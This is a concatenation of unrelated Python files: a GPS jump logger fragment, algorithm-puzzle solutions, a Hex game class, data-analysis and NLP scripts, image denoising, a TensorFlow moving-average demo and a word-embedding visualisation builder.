                FlySightString = '{:04}-{:02}-{:02}T{:02}:{:02}:{:02}.{:02}Z,{:010.7f},{:010.7f},{:.3f},{:.2f},{:.2f},{:.2f},{:.3f},{:.3f},{:.2f},{:.5f},{:.5f},{},'.format(
                    uBX_nav_pvt_msg.year,uBX_nav_pvt_msg.month,uBX_nav_pvt_msg.day,
                    uBX_nav_pvt_msg.hour,uBX_nav_pvt_msg.minute,uBX_nav_pvt_msg.second,
                    bufferMilliseconds,(uBX_nav_pvt_msg.lat/10000000),(uBX_nav_pvt_msg.lon/10000000),
                    (uBX_nav_pvt_msg.hMSL/1000),(uBX_nav_pvt_msg.velN/1000),(uBX_nav_pvt_msg.velE/1000),
                    (uBX_nav_pvt_msg.velD/1000),(uBX_nav_pvt_msg.hAcc/10000),(uBX_nav_pvt_msg.vAcc/10000),
                    (uBX_nav_pvt_msg.sAcc/10000),(uBX_nav_pvt_msg.headMot/100000),(uBX_nav_pvt_msg.headAcc/100000),
                    uBX_nav_pvt_msg.fixType)
                # Satellite count column is capped at 20.
                if uBX_nav_pvt_msg.numSV > 20:
                    FlySightString += "20\n"
                else:
                    FlySightString += '{}\n'.format(uBX_nav_pvt_msg.numSV)
                print(FlySightString)
                f.write(FlySightString)
                # Jump start: vertical speed outside +/-2 m/s (velD is mm/s here).
                if int(uBX_nav_pvt_msg.velD/1000) not in range (-2, 3):
                    counter += 1
                if counter >20 and not trigger:
                    trigger = True
                    counter = 0
                if trigger:
                    # NOTE(review): this compares raw velD (mm/s) against 1000,
                    # i.e. descent slower than 1 m/s - unlike the /1000 scaling
                    # above; confirm the intended landing threshold.
                    if int(uBX_nav_pvt_msg.velD) <= 1000:
                        counter += 1
                    if counter >50:
                        # Redundant inside the with-block, but harmless.
                        f.close()
                        break
############################################################
################ STARTING THE FUNCTIONS ####################
############################################################
# Entry point: configure the GPS receiver, then log until landing detection.
setup()
loop()
|
"""
Question -https://leetcode.com/problems/range-sum-query-2d-immutable/
"""
#Naive Approach - Time Taken - 8898ms
from typing import List  # needed: annotations are evaluated at def-time


class NumMatrix:
    """Naive range-sum query: O(1) init, O(rows*cols) per query."""

    def __init__(self, matrix: List[List[int]]):
        # Keep a reference only; queries read the matrix directly.
        self.matrix = matrix

    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        """Sum of the inclusive rectangle (row1, col1)..(row2, col2)."""
        # Local renamed from `sum` so the builtin is not shadowed.
        total = 0
        for i in range(row1, row2 + 1):
            for j in range(col1, col2 + 1):
                total += self.matrix[i][j]
        return total
#Dynamic Approach - Time Taken - 112ms
from typing import List  # needed: annotations are evaluated at def-time


class NumMatrix:
    """Range-sum query via 2-D prefix sums: O(rows*cols) init, O(1) query."""

    def __init__(self, matrix: List[List[int]]):
        rows = len(matrix)
        if rows == 0:
            # Empty matrix: no queries are answerable.
            self.dp = []
            return
        cols = len(matrix[0])
        # BUG FIX: copy instead of aliasing - the original wrote the prefix
        # sums straight into the caller's matrix, mutating their data.
        dp = [row[:] for row in matrix]
        # Prefix-sum the first column, the first row, then the interior:
        # dp[i][j] = sum of the rectangle (0,0)..(i,j).
        for i in range(1, rows):
            dp[i][0] += dp[i - 1][0]
        for j in range(1, cols):
            dp[0][j] += dp[0][j - 1]
        for i in range(1, rows):
            for j in range(1, cols):
                dp[i][j] += (dp[i - 1][j] + dp[i][j - 1]) - dp[i - 1][j - 1]
        self.dp = dp

    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        """Sum of the inclusive rectangle (row1, col1)..(row2, col2).

        Inclusion-exclusion on the prefix sums: subtract the strip above and
        the strip to the left, then add back the doubly-subtracted corner.
        """
        total = self.dp[row2][col2]
        if row1 > 0 and col1 > 0:
            total += self.dp[row1 - 1][col1 - 1]
        if row1 > 0:
            total -= self.dp[row1 - 1][col2]
        if col1 > 0:
            total -= self.dp[row2][col1 - 1]
        return total
# Two-step joke: show the setup, wait for the user to press Enter,
# then reveal the punchline.
print('What do you get when you cross a snowman with a vampire?')
input()  # pause for dramatic effect; the typed input is discarded
print('Frostbite!')
print()
from numpy import zeros, int_
from unionfind import UnionFind
from meta import GameMeta
class GameState:
    """
    Stores information representing the current state of a game of hex, namely
    the board and the current turn. Also provides functions for playing game.

    White connects top-to-bottom (axis 0); black connects left-to-right
    (axis 1). Connectivity to the virtual edge nodes EDGE1/EDGE2 is tracked
    with one union-find structure per player.
    """
    # dictionary associating numbers with players
    # PLAYERS = {"none": 0, "white": 1, "black": 2}
    # move value of -1 indicates the game has ended so no move is possible
    # GAME_OVER = -1
    # represent edges in the union find structure for detecting the connection
    # for player 1 Edge1 is high and EDGE2 is low
    # for player 2 Edge1 is left and EDGE2 is right
    # neighbor_patterns = ((-1, 0), (0, -1), (-1, 1), (0, 1), (1, 0), (1, -1))

    def __init__(self, size):
        """
        Initialize the game board and give white first turn.
        Also create our union find structures for win checking.
        Args:
            size (int): The board size
        """
        self.size = size
        self.to_play = GameMeta.PLAYERS['white']
        # size x size integer board; 0 = empty (PLAYERS['none']).
        self.board = zeros((size, size))
        self.board = int_(self.board)
        self.white_played = 0
        self.black_played = 0
        self.white_groups = UnionFind()
        self.black_groups = UnionFind()
        # Edge sentinels must not count as ordinary group members.
        self.white_groups.set_ignored_elements([GameMeta.EDGE1, GameMeta.EDGE2])
        self.black_groups.set_ignored_elements([GameMeta.EDGE1, GameMeta.EDGE2])

    def play(self, cell: tuple) -> None:
        """
        Play a stone of the player that owns the current turn in input cell.
        Args:
            cell (tuple): row and column of the cell
        """
        if self.to_play == GameMeta.PLAYERS['white']:
            self.place_white(cell)
            self.to_play = GameMeta.PLAYERS['black']
        elif self.to_play == GameMeta.PLAYERS['black']:
            self.place_black(cell)
            self.to_play = GameMeta.PLAYERS['white']

    def get_num_played(self) -> dict:
        """Return stone counts as {'white': n, 'black': m}."""
        return {'white': self.white_played, 'black': self.black_played}

    def get_white_groups(self) -> dict:
        """
        Returns (dict): groups of white stones for unionfind check
        """
        return self.white_groups.get_groups()

    def get_black_groups(self) -> dict:
        """
        Returns (dict): groups of black stones for unionfind check
        """
        return self.black_groups.get_groups()

    # NOTE(review): place_white and place_black share almost all their logic
    # (only the player, counter, group structure and edge axis differ) -
    # candidate for extraction into one private helper.
    def place_white(self, cell: tuple) -> None:
        """
        Place a white stone regardless of whose turn it is.
        Args:
            cell (tuple): row and column of the cell
        Raises:
            ValueError: if the cell is already occupied
        """
        if self.board[cell] == GameMeta.PLAYERS['none']:
            self.board[cell] = GameMeta.PLAYERS['white']
            self.white_played += 1
        else:
            raise ValueError("Cell occupied")
        # if the placed cell touches a white edge connect it appropriately
        if cell[0] == 0:
            self.white_groups.join(GameMeta.EDGE1, cell)
        if cell[0] == self.size - 1:
            self.white_groups.join(GameMeta.EDGE2, cell)
        # join any groups connected by the new white stone
        for n in self.neighbors(cell):
            if self.board[n] == GameMeta.PLAYERS['white']:
                self.white_groups.join(n, cell)

    def place_black(self, cell: tuple) -> None:
        """
        Place a black stone regardless of whose turn it is.
        Args:
            cell (tuple): row and column of the cell
        Raises:
            ValueError: if the cell is already occupied
        """
        if self.board[cell] == GameMeta.PLAYERS['none']:
            self.board[cell] = GameMeta.PLAYERS['black']
            self.black_played += 1
        else:
            raise ValueError("Cell occupied")
        # if the placed cell touches a black edge connect it appropriately
        if cell[1] == 0:
            self.black_groups.join(GameMeta.EDGE1, cell)
        if cell[1] == self.size - 1:
            self.black_groups.join(GameMeta.EDGE2, cell)
        # join any groups connected by the new black stone
        for n in self.neighbors(cell):
            if self.board[n] == GameMeta.PLAYERS['black']:
                self.black_groups.join(n, cell)

    def would_lose(self, cell: tuple, color: int) -> bool:
        """
        Return True if the move indicated by cell and color would lose the game,
        False otherwise.

        "Lose" here means the move completes the OPPONENT-relevant connection
        for `color`'s own edges, i.e. both of color's edges become reachable.
        """
        connect1 = False
        connect2 = False
        if color == GameMeta.PLAYERS['black']:
            if cell[1] == 0:
                connect1 = True
            elif cell[1] == self.size - 1:
                connect2 = True
            for n in self.neighbors(cell):
                if self.black_groups.connected(GameMeta.EDGE1, n):
                    connect1 = True
                elif self.black_groups.connected(GameMeta.EDGE2, n):
                    connect2 = True
        elif color == GameMeta.PLAYERS['white']:
            if cell[0] == 0:
                connect1 = True
            elif cell[0] == self.size - 1:
                connect2 = True
            for n in self.neighbors(cell):
                if self.white_groups.connected(GameMeta.EDGE1, n):
                    connect1 = True
                elif self.white_groups.connected(GameMeta.EDGE2, n):
                    connect2 = True
        return connect1 and connect2

    def turn(self) -> int:
        """
        Return the player with the next move.
        """
        return self.to_play

    def set_turn(self, player: int) -> None:
        """
        Set the player to take the next move.
        Raises:
            ValueError if player turn is not 1 or 2
        """
        if player in GameMeta.PLAYERS.values() and player != GameMeta.PLAYERS['none']:
            self.to_play = player
        else:
            raise ValueError('Invalid turn: ' + str(player))

    @property
    def winner(self) -> int:
        """
        Return a number corresponding to the winning player,
        or none if the game is not over.
        """
        if self.white_groups.connected(GameMeta.EDGE1, GameMeta.EDGE2):
            return GameMeta.PLAYERS['white']
        elif self.black_groups.connected(GameMeta.EDGE1, GameMeta.EDGE2):
            return GameMeta.PLAYERS['black']
        else:
            return GameMeta.PLAYERS['none']

    def neighbors(self, cell: tuple) -> list:
        """
        Return list of on-board neighbors of the passed cell.
        Args:
            cell (tuple): row and column of the cell
        """
        x = cell[0]
        y = cell[1]
        return [(n[0] + x, n[1] + y) for n in GameMeta.NEIGHBOR_PATTERNS
                if (0 <= n[0] + x < self.size and 0 <= n[1] + y < self.size)]

    def moves(self) -> list:
        """
        Get a list of all moves possible on the current board.
        """
        moves = []
        for y in range(self.size):
            for x in range(self.size):
                if self.board[x, y] == GameMeta.PLAYERS['none']:
                    moves.append((x, y))
        return moves

    def __str__(self):
        """
        Print an ascii representation of the game board.
        Notes:
            Used for gtp interface
        """
        white = 'W'
        black = 'B'
        empty = '.'
        ret = '\n'
        coord_size = len(str(self.size))
        offset = 1
        # column header row (A, B, C, ...)
        ret += ' ' * (offset + 1)
        for x in range(self.size):
            ret += chr(ord('A') + x) + ' ' * offset * 2
        ret += '\n'
        for y in range(self.size):
            # row label, padded so the hex skew lines up
            ret += str(y + 1) + ' ' * (offset * 2 + coord_size - len(str(y + 1)))
            for x in range(self.size):
                if self.board[x, y] == GameMeta.PLAYERS['white']:
                    ret += white
                elif self.board[x, y] == GameMeta.PLAYERS['black']:
                    ret += black
                else:
                    ret += empty
                ret += ' ' * offset * 2
            # white edge marker on the right, then indent the next skewed row
            ret += white + "\n" + ' ' * offset * (y + 1)
        # bottom black edge row
        ret += ' ' * (offset * 2 + 1) + (black + ' ' * offset * 2) * self.size
        return ret
|
'''
给定一个数字,我们按照如下规则把它翻译为字符串:0 翻译成 “a” ,1 翻译成 “b”,……,11 翻译成 “l”,……,25 翻译成 “z”。一个数字可能有多个翻译。请编程实现一个函数,用来计算一个数字有多少种不同的翻译方法。
示例 1:
输入: 12258
输出: 5
解释: 12258有5种不同的翻译,分别是"bccfi", "bwfi", "bczi", "mcfi"和"mzi"
提示:
0 <= num < 231
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/ba-shu-zi-fan-yi-cheng-zi-fu-chuan-lcof
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
'''
# 1 自己 动态 用数组存储结果 44/15
# class Solution:
# def translateNum(self, num: int) -> int:
# if num < 10: return 1
# combo_nums = [1]
# num_list = [int(char) for char in str(num)]
# # 处理idx = 1的数的翻译种类数
# combo_nums.append(2 if num_list[0] == 1 or (num_list[0] == 2 and num_list[1] <= 5) else 1)
# for i in range(2,len(num_list)):
# combo_nums.append(combo_nums[-1] + combo_nums[-2] \
# if num_list[i-1] == 1 or (num_list[i-1] == 2 and num_list[i] <= 5) else combo_nums[-1])
# return combo_nums[-1]
# 2 自己 动态 升级 用两个变量存储结果 32/14 93/25 O(n) O(n)
class Solution:
    def translateNum(self, num: int) -> int:
        """Count the distinct letter translations of num.

        Rolling DP over the decimal digits (left to right): a two-digit
        group translates as one letter only when it is in 10..25.
        O(n) time, O(n) space for the digit list.
        """
        if num < 10:
            return 1
        digits = [int(ch) for ch in str(num)]
        # pre / cur = translation counts for the prefixes ending at the
        # previous two positions. The leading pair never has a zero first
        # digit, so only the < 26 check is needed to seed cur.
        first_pair = digits[0] * 10 + digits[1]
        pre, cur = 1, 2 if first_pair < 26 else 1
        for i in range(2, len(digits)):
            pair = digits[i - 1] * 10 + digits[i]
            if pair < 26 and digits[i - 1] != 0:
                pre, cur = cur, pre + cur
            else:
                pre = cur
        return cur
# 3 大佬 空间复杂度为O(1),因为没创建数字列表。从右到左依次遍历
class Solution:
    def translateNum(self, num: int) -> int:
        """Count the distinct letter translations of num in O(1) space.

        Walks the digits right to left using arithmetic only (no digit
        list), keeping two rolling counts:
          a - translations of the suffix starting at the current digit
          b - translations of the suffix one digit further right
        """
        a = b = 1
        prev = num % 10
        while num != 0:
            num //= 10
            digit = num % 10
            # The pair (digit, prev) maps to a single letter only for 10..25.
            if 10 <= digit * 10 + prev <= 25:
                a, b = a + b, a
            else:
                b = a
            prev = digit
        return a
|
#!/usr/bin/env python
# coding: utf-8
# In[67]:
import pandas as pd
import scipy.stats as stats
# In[68]:
# NOTE(review): error_bad_lines is deprecated/removed in newer pandas
# (replaced by on_bad_lines); pin the pandas version or migrate.
df = pd.read_csv('Tabulated_Metrics.csv', error_bad_lines=False)
# In[69]:
import matplotlib.pyplot as plt
# In[70]:
# Restrict the analysis to a single project.
is_true = df['Project_Name']=='Project 3 - Apache Commons Collections'
# In[71]:
df = df[is_true]
# In[72]:
df.head()
# In[73]:
# Defect density: bugs per thousand lines of code.
df['DD'] = ((df['bugs'] / df['LOC'] )) * 1000
# In[74]:
# Churned code as a fraction of total LOC.
df['Relative_Churned'] = ((df['Churned_Code'] / df['LOC'] ))
# In[75]:
df.head(25)
# In[76]:
df.corr(method ='spearman')
# In[77]:
df[['Relative_Churned','DD']].corr(method ='spearman')
# In[78]:
# Spearman rank correlation between coverage metrics and defect density,
# with scatter plots for visual inspection.
df.plot(x='Statement_Coverage', y='DD', style='o')
# In[79]:
df_clean = df.dropna()
# In[80]:
stats.spearmanr(df_clean['Statement_Coverage'], df_clean['DD'])
# In[81]:
df[['Statement_Coverage','DD']].corr(method ='spearman')
# In[82]:
df.plot(x='Branch_Coverage', y='DD', style='o')
# In[83]:
df_clean = df.dropna()
# In[84]:
stats.spearmanr(df_clean['Branch_Coverage'], df_clean['DD'])
# In[85]:
df[['Branch_Coverage','DD']].corr(method ='spearman')
# In[86]:
# The Branch_Coverage analysis below repeats cells 82-85 verbatim
# (notebook-export duplication).
df.plot(x='Branch_Coverage', y='DD', style='o')
# In[ ]:
# In[87]:
df_clean = df.dropna()
# In[88]:
stats.spearmanr(df_clean['Branch_Coverage'], df_clean['DD'])
# In[89]:
df[['Branch_Coverage','DD']].corr(method ='spearman')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Data management unit for the tweetanalyzer. """
__author__ = 'Strahinja Ivanovic'
# Import needed utilities
import re
from nltk.corpus import stopwords
import HTMLParser
html_parser = HTMLParser.HTMLParser()
APPOSTROPHES = {"'s":"is", "'re":"are", "'m":"am", "'t":"not", "'ll":"will", "ill":"I will", "im":"I am",
"wanna":"want to", "gonna": "going to"}
def cleanData(rawTweets, outputfile):
    """
    Cleans the given Data according to certain text mining methods and prints the cleaned output in a textfile
    :param rawTweets: Input source which has to be cleaned (iterable of raw UTF-8 tweet lines)
    :param outputfile: Name the output file should have
    :return: None
    """
    # Use a context manager so the output file is closed (and flushed) even
    # if cleaning a line raises - the original leaked the file handle.
    with open(outputfile, 'w') as NewFile:
        for eachline in rawTweets:
            # decode to UTF-8 and drop non-ASCII characters (Python 2 str API)
            cleanedTweets = eachline.decode("utf8").encode('ascii', 'ignore')
            # remove html entities/tags
            cleanedTweets = html_parser.unescape(cleanedTweets)
            # lower all letters for standardization
            cleanedTweets = cleanedTweets.lower()
            # expand contractions/slang via the APPOSTROPHES lookup table
            cleanedTweets = [APPOSTROPHES[word] if word in APPOSTROPHES else word for word in cleanedTweets.split()]
            cleanedTweets = " ".join(cleanedTweets)
            # remove stopwords
            #cleanedTweets = ' '.join([word for word in cleanedTweets.split() if word not in stopwords.words("english")])
            # remove links
            cleanedTweets = re.sub(r'http\S+', '', cleanedTweets)
            # remove hashtags
            cleanedTweets = re.sub(r'#\w+ ?', '', cleanedTweets)
            # remove remaining special characters
            cleanedTweets = re.sub('[^A-Za-z0-9 ]+','',cleanedTweets)
            # print the output in a new File
            NewFile.write('%s \n' % cleanedTweets)
|
import numpy as np
import cv2
import skimage
from matplotlib import pyplot as plt
from time import time
import scipy.misc
import scipy.ndimage
from sklearn.decomposition import MiniBatchDictionaryLearning
from sklearn.feature_extraction.image import extract_patches_2d
from sklearn.feature_extraction.image import reconstruct_from_patches_2d
from show_with_diff import show_with_diff
from add_noise import noisy
# Load the working frame and the reference "shape" image as greyscale floats.
# NOTE(review): scipy.ndimage.imread is deprecated/removed in recent SciPy —
# confirm the pinned SciPy version.
frame = scipy.ndimage.imread('150.jpg', flatten=True, mode='L')
shape = scipy.ndimage.imread('shape.png', flatten=True, mode='L')
##Store frame in variale of type float32 (gray)
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.imshow('frame',gray)
gray = np.asarray(frame, dtype=np.float32)
# Scale pixel values into [0, 1].
gray /= 255
face = gray
##Down sample for speed
#face = gray[::2, ::2] + gray[1::2, ::2] + gray[::2, 1::2] + gray[1::2, 1::2]
# NOTE(review): dividing by 0.5 doubles the intensities; with the 2x2
# down-sampling above disabled this looks like a leftover of '/= 4.0' — verify.
face /= 0.5
height, width = face.shape
# Distort the image with one of the noise models supported by add_noise.noisy:
#'gauss' Gaussian-distributed additive noise.
#'poisson' Poisson-distributed noise generated from the data.
#'s&p' Replaces random pixels with 0 or 1.
#'speckle' Multiplicative noise using out = image + n*image,where n is uniform noise with specified mean & variance.
print('Distorting image...')
distorted = face.copy()
#distorted += 1* np.random.randn(height, width )##Gaussian noise
distorted = noisy('s&p', distorted)
#pic = distorted *255
#pic = pic.astype('uint8')
#cv2.imwrite('noised.png',pic)
cv2.imshow('distorted', distorted)
cv2.waitKey()
# Extract all reference patches from the reference shape image.
print('Extracting reference patches...')
t0 = time()
patch_size = (7, 7)
data = extract_patches_2d(shape, patch_size)
data = data.reshape(data.shape[0], -1)
# Normalise patches: zero mean / unit variance per pixel position.
data -= np.mean(data, axis=0)
data /= np.std(data, axis=0)
print('done in %.2fs.' % (time() - t0))
# #############################################################################
# Learn the dictionary from reference patches
print('Learning the dictionary...')
t0 = time()
dico = MiniBatchDictionaryLearning(n_components=200, alpha=1, n_iter=500)
V = dico.fit(data).components_
dt = time() - t0
print('done in %.2fs.' % dt)
# #############################################################################
# Extract noisy patches and reconstruct them using the dictionary
print('Extracting noisy patches... ')
t0 = time()
data = extract_patches_2d(distorted, patch_size)
data = data.reshape(data.shape[0], -1)
# Center the noisy patches; the mean is added back after reconstruction.
intercept = np.mean(data, axis=0)
data -= intercept
print('done in %.2fs.' % (time() - t0))
transform_algorithms = [
    ('Orthogonal Matching Pursuit\n1 atom', 'omp',
     {'transform_n_nonzero_coefs': 1})]
reconstructions = {}
for title, transform_algorithm, kwargs in transform_algorithms:
    print(title + '...')
    reconstructions[title] = face.copy()
    t0 = time()
    dico.set_params(transform_algorithm=transform_algorithm, **kwargs)
    # Sparse-code the noisy patches against the learned dictionary V.
    code = dico.transform(data)
    patches = np.dot(code, V)
    patches += intercept
    patches = patches.reshape(len(data), *patch_size)
    if transform_algorithm == 'threshold':
        # Thresholding output is rescaled into [0, 1].
        patches -= patches.min()
        patches /= patches.max()
    reconstructions[title] = reconstruct_from_patches_2d(
        patches, (height, width))
    dt = time() - t0
    print('done in %.2fs.' % dt)
    show_with_diff(reconstructions[title], face,
                   title + ' (time: %.1fs)' % dt)
plt.show()
|
import os
import re
import sys
# No-op guard: detects whether we are running inside Maya's bundled
# interpreter (executable name starts with "maya"); currently does nothing.
if re.match('maya.*', os.path.basename(sys.executable), re.IGNORECASE):
    pass
# Reload libs
import libAttr
import libCtrlShapes
import libFormula
import libPython
import libQt
import libPymel
import libSkeleton
import libRigging
import libSkinning
import libStringMap
import libUtils
import libHistory
import libComponent
def _reload():
    """Reload every library module of this package (dev convenience for Maya)."""
    for module in (
        libAttr,
        libCtrlShapes,
        libFormula,
        libPython,
        libQt,
        libPymel,
        libSkeleton,
        libRigging,
        libSkinning,
        libStringMap,
        libUtils,
        libHistory,
        libComponent,
    ):
        reload(module)
import tensorflow as tf
# Demo of tf.train.ExponentialMovingAverage (TF1 session style).
EMA_DECAY = 0.99
epoch = 100
# Step counter driving the dynamic decay min(EMA_DECAY, (1+step)/(10+step)).
ema_step = tf.Variable(initial_value=0, dtype=tf.int32, trainable=False)
ema = tf.train.ExponentialMovingAverage(decay=EMA_DECAY, num_updates=ema_step)
v = tf.Variable(100000.0, name="v", dtype=tf.float32)
# Maintain a shadow variable holding the moving average of v;
# ema.average(v) returns the current averaged value.
v_ema_op = ema.apply([v])
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(v_ema_op)
    print("开始值:{0}".format(sess.run([v, ema.average(v)])))
    # Jump v down and watch the shadow value chase it over `epoch` updates.
    sess.run(tf.assign(v, 10000.0))
    for i in range(epoch):
        # sess.run(tf.assign_add(v, 100))
        print("v={0}, num_step={1},decay={2}".format(sess.run(v), sess.run(ema_step),
                                                     sess.run(tf.minimum(EMA_DECAY, tf.cast((1+ema_step)/(10+ema_step), tf.float32)))))
        sess.run(v_ema_op)
        print(sess.run([v, ema.average(v)]))
        sess.run(tf.assign_add(ema_step,1))
|
from collections import defaultdict
from tkinter import EW
from typing import Any, Dict, List
import numpy as np
import os
from sklearn.decomposition import PCA
import io
# Per-language node colour for the JS graph; unknown languages fall back to
# 'lightblue' via the defaultdict factory.
colours = defaultdict(lambda: 'lightblue', **{
    'af': '#F51AA4',
    'en': 'pink',
    'de': '#7CFFCB'
})
# These words were translated using a combination of google translate and my own translations.
# The latter few words were gotten from: https://www.englishclub.com/vocabulary/common-nouns-25.htm
# NOTE: only the first 10 of each appended "common nouns" list are kept ([:10]).
all_words = {
    'af':['koning', 'hond', 'kat', 'koningin', 'boot', 'see', 'strand', 'kroon', 'seil', 'lewe', 'man', 'vrou', 'geskiedenis', 'verlede', 'now', 'toekoms'] + ['tyd', 'persoon', 'jaar', 'manier', 'dag', 'ding', 'man', 'wêreld', 'lewe', 'hand', 'deel', 'kind', 'oog', 'vrou', 'plek', 'werk', 'week', 'saak', 'punt', 'regering', 'geselskap', 'nommer', 'groep', 'probleem', 'feit',][:10],
    'en':['king', 'dog', 'cat', 'queen', 'boat', 'sea', 'beach', 'crown', 'sail', 'live', 'hamster', 'man', 'woman', 'royalty', 'history', 'story', 'past', 'present', 'future'] + ['time','person','year','way','day','thing','man','world','life','hand','part','child','eye','woman','place','work','week','case','point','government','company','number','group','problem','fact',][:10],
    'de':['König', 'hund', 'katze', 'Königin', 'boot', 'meer', 'strand', 'krone', 'segel', 'lebe', 'hamster', 'mann', 'frau', 'Königtum', 'geschichte', 'geschichte', 'Vergangenheit', 'jetzt', 'Zukunft'] + ['Zeit', 'Person', 'Jahr', 'Weg', 'Tag', 'Ding', 'Mann', 'Welt', 'Leben', 'Hand', 'Teil', 'Kind', 'Auge', 'Frau', 'Platz', 'Arbeit', 'Woche', 'Fall', 'Punkt', 'Regierung', 'Unternehmen', 'Nummer', 'Gruppe', 'Problem', 'Tatsache',][:10],
}
# Template path of the aligned fasttext vector files; {lang} is substituted.
FILENAME = '~/Downloads/wiki.{lang}.align.vec'
def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    """Return the cosine similarity between *a* and *b*.

    Returns:
        float: ranges from -1 (opposite directions) to 1 (same direction).
    """
    norm_product = np.linalg.norm(a) * np.linalg.norm(b)
    return np.dot(a, b) / norm_product
def write(dic: Dict[str, np.ndarray], name: str):
    """Write the dictionary into a file using the fasttext format.

    First line is "<word count> 300"; each following line is the word
    followed by its space-separated vector components.

    Args:
        dic (Dict[str, np.ndarray]): Dict of word -> vector
        name (str): The filename to write the dictionary to.
    """
    # Build all lines once and join them, instead of quadratic string +=.
    lines = [f"{len(dic)} 300"]
    for key, value in dic.items():
        lines.append(f"{key} {' '.join(map(str, value))}")
    with open(name, 'w+') as f:
        f.write("\n".join(lines) + "\n")
def main(lang: str):
    """Extract this language's word vectors from the big aligned fasttext file.

    Reads FILENAME (with {lang} substituted) and writes the found words into a
    smaller file 'smaller/{lang}_300_small_wiki.vec'.

    Args:
        lang (str): The language to read and write.
    """
    name = FILENAME.format(lang=lang)
    # De-duplicate the word list for this language.
    words = list(set(all_words[lang]))
    dic = {}
    for word in words:
        # Look for the word in the big file (first case-insensitive match).
        ans = os.popen(f"grep -i -m 1 '^{word} ' {name}").read()
        # First line of grep output (empty string when nothing matched).
        first_line = ans.split("\n")[0]
        if len(first_line) == 0:
            print(f"Word {word} is not found inside file {name}")
            # BUG FIX: skip missing words instead of falling through and
            # adding a bogus '' -> empty-vector entry to the dictionary.
            continue
        # Line layout: the word itself followed by its 300 vector components.
        things = first_line.split(" ")
        dic[things[0].lower()] = np.array(list(map(float, things[1:])))
    # Save the extracted subset.
    write(dic, f'smaller/{lang}_300_small_wiki.vec')
def load_vectors(fname: str) -> Dict[str, np.ndarray]:
    """Read a fasttext-format vector file into a word -> vector dictionary.

    Args:
        fname (str): File to read from

    Returns:
        Dict[str, np.ndarray]: mapping from word to its vector
    """
    # BUG FIX: close the file handle (the original leaked it).
    with io.open(fname, 'r', encoding='utf-8', newline='\n') as fin:
        # Header line: "<word count> <dimension>" (values not otherwise used).
        n, d = map(int, fin.readline().split())
        data = {}
        for line in fin:
            tokens = line.rstrip().split(' ')
            data[tokens[0]] = np.array(list(map(float, tokens[1:])))
    return data
def save_js_dic(dic: Dict[str, np.ndarray], new_x: np.ndarray) -> Dict[str, Any]:
    """Build the graph description used by the javascript display code.

    Args:
        dic (Dict[str, np.ndarray]): The words and their vectors
        new_x (np.ndarray): shape (len(dic), 2) — 2D position of each word

    Returns:
        Dict[str, Any]: {'nodes': [...], 'dists': NxN cosine-similarity matrix}
    """
    words = list(dic.keys())
    count = len(words)
    # Distance matrix initialised to 1 everywhere; the diagonal stays 1
    # (self-similarity), off-diagonal entries are filled below.
    graph = {
        'nodes': [],
        'dists': [[1 for _ in range(count)] for _ in range(count)]
    }

    def node_colour(word):
        # Colour is keyed on the language suffix after the last underscore.
        return colours[word.split('_')[-1].lower()]

    for i in range(count):
        # Fill the symmetric cosine-similarity entries for all later words.
        for j in range(i + 1, count):
            similarity = cosine_similarity(dic[words[i]], dic[words[j]])
            graph['dists'][i][j] = similarity
            graph['dists'][j][i] = similarity
        # Add the node with its PCA'd x/y position.
        graph['nodes'].append({'id': i, 'label': words[i], 'color': node_colour(words[i]), 'x': new_x[i][0], 'y': new_x[i][1]})
    return (graph)
def make_js_dic_new_wiki(langs: List[str]):
    """Load the small per-language vector files and emit the JS data file.

    Reads 'smaller/{lang}_300_small_wiki.vec' for every language, reduces the
    300-D vectors to 2-D with PCA, and writes the node/distance object to
    ../web/data.js.

    Args:
        langs (List[str]): The list of languages
    """
    combined = {}
    for lang in langs:
        vectors = load_vectors(f'smaller/{lang}_300_small_wiki.vec')
        # Suffix each word with its language so keys stay unique.
        for word, vec in vectors.items():
            combined[word + "_" + lang.upper()] = vec
    # PCA the 300-D vectors down to 2-D for plotting.
    matrix = np.array([combined[k] for k in combined])
    reduced = PCA(n_components=2).fit_transform(matrix)
    with open('../web/data.js', 'w+') as f:
        f.write(f"const data2 = {save_js_dic(combined, reduced)}")
if __name__ == '__main__':
    # Extract the small per-language vector files, then build the JS data file.
    langs = all_words.keys()
    for lang in langs:
        print(f"Parsing Language {lang}")
        main(lang)
    make_js_dic_new_wiki(langs); exit()
|
# "Bursting gourds" : https://www.acmicpc.net/problem/19939
N, K = map(int,input().split())
# Optimal: line up the K consecutive counts 1..K and add the same amount to
# each; the answer is the max-min difference.
# e.g. 30 4: start 1,2,3,4, add +5 each -> 6,7,8,9, difference 3
# 31 4: 6,7,8,10 -> difference 4, and it stays 4 up to 33
# at 34 it becomes 7,8,9,10 -> back to 3
# i.e. when the leftover divides evenly by K the answer is K-1, otherwise K.
# If we cannot even line up 1..K (N smaller than total): -1
total = K * (K + 1) // 2
diff = N - total
if N < total:
    print(-1)
elif diff % K == 0:
    print(K - 1)
else:
    print(K)
|
class Solution(object):
    """Minimum-window-substring solver (sliding window, two pointers)."""

    def minWindowSize(self, str1, str2):
        """Return the smallest substring of str1 containing every char of str2.

        Returns "" for empty/impossible inputs (str2 longer than str1) and
        the sentinel "empty" when no window covers all of str2.
        """
        if not str1 or not str2 or len(str2) > len(str1):
            return ""
        # Character counts still needed from str2.
        need = {}
        for ch in str2:
            need[ch] = need.get(ch, 0) + 1
        missing = len(str2)
        best_len = len(str1) + 1
        best = ""
        left = 0
        for right, ch in enumerate(str1):
            # Extend the window; only positive counts reduce `missing`.
            if ch in need:
                if need[ch] > 0:
                    missing -= 1
                need[ch] -= 1
            # Shrink from the left while the window is still complete.
            while missing == 0:
                if right - left + 1 < best_len:
                    best_len = right - left + 1
                    best = str1[left: right + 1]
                left_ch = str1[left]
                if left_ch in need:
                    need[left_ch] += 1
                    if need[left_ch] > 0:
                        missing += 1
                left += 1
        return "empty" if best_len == len(str1) + 1 else best
# Demo: smallest window of str1 containing all characters of str2 -> "BANC".
s = Solution()
str1 = "ADOBECODEBANC"
str2 = "ABC"
print(s.minWindowSize(str1, str2))
|
import logging
import boto3
import json
